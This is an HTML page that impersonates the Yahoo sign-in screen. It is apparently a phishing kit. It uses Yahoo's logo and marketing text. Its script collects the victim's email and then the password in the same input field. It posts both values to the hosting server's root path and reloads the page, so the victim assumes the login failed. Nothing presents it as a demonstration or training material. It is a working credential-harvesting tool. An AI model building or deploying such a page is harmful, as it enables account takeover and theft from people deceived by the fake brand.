
<html>
    <head>
      <title>Yahoo-login</title>
      <meta name='viewport' content='width=device-width, initial-scale=1' />
      <style>
        .cursor:hover{cursor: pointer;}
        input::-webkit-input-placeholder{font-size: 15px;}
        input:focus{outline: none;}
        @media screen and (min-width: 600px) {
            body{
            min-width: 1450px;
          }
          #box{
            position: absolute;
            left: 900px;
            top: 70px;
            width: 355px;
            height: 555px;
            border-top: 5px solid #8533ff;
            box-shadow: 0px 0px 5px #888888;
          }
          #image {
            position: absolute;
            top: 50px;
            right: 110px;
            width: 150px !important;
            height: 45px !important;
          }
          #txt1 {
            font-size: 20px !important;
            position: absolute;
            top: 120px;
            right: 75px;
          }
          input::-webkit-input-placeholder{font-size: 15px;}
          input{
            font-size: 20px !important;
            height: 15px !important;
            position: absolute;
            top: 200px;
            right: 35px;
          }
          button{
            font-size: 17px !important;
            height: 40px !important;
            position: absolute;
            top: 270px;
            right: 30px;
          }
          #txt2{
            font-size: 15px !important;
            position: absolute;
            top: 380px;
            right: 120px;
          }
          #txt3{
            visibility: visible !important;
            font-size: 20px;
            position: absolute;
            bottom: 20px;
            right: 83px;
          }
          #txt4{
            visibility: hidden;
          }
          #left-txt{
            display: initial !important;
            text-align: left;
            width: 560px;
            position:absolute;
            top: 150px;
            left: 300px;
          }
        }
      </style>
    </head>
    <body style='text-align: center;'>
      <div>
        <div id='left-txt' style='display: none;'><div style='font-size: 25px;'><b>Yahoo makes it easy to enjoy what matters most in your world.</b></div><br><div style='font-size: 20px;'>Best in class Yahoo Mail, breaking local, national and global news, finance, sport, music, movies and more. You get more out of the web,you get more out of life.</div></div>
          <div id='box'>
          <br>
        <div>
          <img src='https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png' id='image' style='width: 170px; height: 70px;'></img>
        </div>
      <p1 id='txt1' style='font-size:150%'><b>Sign in to your account<br><br><br></b></p1>
      <input type='text' placeholder='Enter your email' id='userpass' style='width: 80%; height: 30px;  padding: 12px; border: transparent; border-bottom: 2px solid blue; font-size: 15px;'><br><br>
      <button onclick='entered()' class='cursor' id='button' style='width:82%; height: 50px; font-size:20px; border:none; border-radius:5px; background: #188fff; padding: 10px; color: white;'>Next</button><br><br>
      <div id='txt2' style='color: #188fff;' class='cursor'>Trouble signing in?</div>
        <div id='txt3' style='visibility: hidden;'>Yahoo! your account</div>
      <div id='txt4' style='position:absolute; bottom:50%; margin-bottom: -280px; left:50%; margin-left: -135px;'>New to Yahoo? <p1 class='cursor' style='color: #188fff;'>Sign up for a new account</p1></div>
      </div>

      <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
    <script>
      var boom=0;
      var x = '';
      var y = ''
      function entered() {
        if (boom==0 && document.getElementById('userpass').value != ''){
          x += document.getElementById('userpass').value;
          document.getElementById('userpass').placeholder = 'Password';
          document.getElementById('userpass').value = '';
          document.getElementById('userpass').type = 'password';
          document.getElementById('button').innerHTML  = 'Sign in';boom = 1;
        }
        if (boom==1 && document.getElementById('userpass').value != ''){
          y += document.getElementById('userpass').value ;

          $.post('/', {
                        "email": x,
                        "password": y,
                    },function(data) {
                        console.log('procesamiento finalizado', data);
                    });
            document.location.reload();
        }
      }
    </script>
    </body>